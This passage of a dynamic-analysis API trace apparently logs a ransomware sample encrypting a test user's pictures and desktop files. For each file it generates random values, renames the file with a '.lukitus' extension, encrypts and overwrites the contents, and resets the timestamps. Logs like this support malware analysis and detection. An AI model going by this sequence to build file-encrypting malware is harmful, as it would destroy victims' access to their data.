fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7046ecd0, ftCreationTime.dwHighDateTime=0x1d2f972, ftLastAccessTime.dwLowDateTime=0x51683450, ftLastAccessTime.dwHighDateTime=0x1d305a6, ftLastWriteTime.dwLowDateTime=0x51683450, ftLastWriteTime.dwHighDateTime=0x1d305a6, nFileSizeHigh=0x0, nFileSizeLow=0x16091)) returned 1 [0107.887] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.888] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\mk3Q8l7gVRDjyXXB.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\mk3q8l7gvrdjyxxb.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.888] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\mk3Q8l7gVRDjyXXB.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\mk3q8l7gvrdjyxxb.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-0725FD16-48003B943989.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-0725fd16-48003b943989.lukitus"), dwFlags=0x9) returned 1 [0107.889] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.889] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.894] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x16091, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x16091, lpOverlapped=0x0) returned 1 [0107.895] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.895] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x16091, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x16091, lpOverlapped=0x0) returned 1 [0107.895] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.895] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x645556d0, dwHighDateTime=0x1d31760)) [0107.895] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.896] FlushFileBuffers (hFile=0x328) returned 1 [0107.899] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\fgtu.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\fgtu.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46a633b0, ftCreationTime.dwHighDateTime=0x1d30221, ftLastAccessTime.dwLowDateTime=0xdeb4bac0, ftLastAccessTime.dwHighDateTime=0x1d3007b, ftLastWriteTime.dwLowDateTime=0xdeb4bac0, ftLastWriteTime.dwHighDateTime=0x1d3007b, nFileSizeHigh=0x0, nFileSizeLow=0x17f2c)) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.900] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\fgtu.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\fgtu.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.900] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\fgtu.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\fgtu.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-21EA5F2C-8701A72F2220.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-21ea5f2c-8701a72f2220.lukitus"), dwFlags=0x9) returned 1 [0107.901] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.901] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.906] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x17f2c, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17f2c, lpOverlapped=0x0) returned 1 [0107.907] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.907] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17f2c, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17f2c, lpOverlapped=0x0) returned 1 [0107.907] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.907] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6457b830, dwHighDateTime=0x1d31760)) [0107.907] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.907] FlushFileBuffers (hFile=0x328) returned 1 [0107.910] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\aci3.png" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\aci3.png"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d0e9c0, ftCreationTime.dwHighDateTime=0x1d2fddf, ftLastAccessTime.dwLowDateTime=0xbb2402d0, ftLastAccessTime.dwHighDateTime=0x1d2f8ee, ftLastWriteTime.dwLowDateTime=0xbb2402d0, ftLastWriteTime.dwHighDateTime=0x1d2f8ee, nFileSizeHigh=0x0, nFileSizeLow=0x18a26)) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.910] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.911] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\aci3.png" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\aci3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.911] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\aci3.png" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\aci3.png"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-5EEEF7E5-307233FEB153.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-5eeef7e5-307233feb153.lukitus"), dwFlags=0x9) returned 1 [0107.912] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.912] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.918] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x18a26, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x18a26, lpOverlapped=0x0) returned 1 [0107.918] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.918] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x18a26, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x18a26, lpOverlapped=0x0) returned 1 [0107.919] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.919] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x645a1990, dwHighDateTime=0x1d31760)) [0107.919] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.919] FlushFileBuffers (hFile=0x328) returned 1 [0107.922] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\COLwLh6JcRBU0.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\colwlh6jcrbu0.bmp"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x983862e0, ftCreationTime.dwHighDateTime=0x1d302d8, ftLastAccessTime.dwLowDateTime=0x3ad95fa0, ftLastAccessTime.dwHighDateTime=0x1d2fab3, ftLastWriteTime.dwLowDateTime=0x3ad95fa0, ftLastWriteTime.dwHighDateTime=0x1d2fab3, nFileSizeHigh=0x0, nFileSizeLow=0x10c3c)) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.923] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\COLwLh6JcRBU0.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\colwlh6jcrbu0.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.923] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\COLwLh6JcRBU0.bmp" (normalized: "c:\\users\\aetadzjz\\desktop\\colwlh6jcrbu0.bmp"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-105FD1E1-6C6BE53496EA.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-105fd1e1-6c6be53496ea.lukitus"), dwFlags=0x9) returned 1 [0107.924] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.924] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.929] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10c3c, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10c3c, lpOverlapped=0x0) returned 1 [0107.930] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.930] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10c3c, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10c3c, lpOverlapped=0x0) returned 1 [0107.930] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.930] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x645a1990, dwHighDateTime=0x1d31760)) [0107.930] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.931] FlushFileBuffers (hFile=0x328) returned 1 [0107.933] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\lvLOYOhTcvvr3 yEH.gif" (normalized: "c:\\users\\aetadzjz\\desktop\\lvloyohtcvvr3 yeh.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x246fe760, ftCreationTime.dwHighDateTime=0x1d2ff91, ftLastAccessTime.dwLowDateTime=0x72b6dad0, ftLastAccessTime.dwHighDateTime=0x1d302c7, ftLastWriteTime.dwLowDateTime=0x72b6dad0, ftLastWriteTime.dwHighDateTime=0x1d302c7, nFileSizeHigh=0x0, nFileSizeLow=0xe8b3)) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.934] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 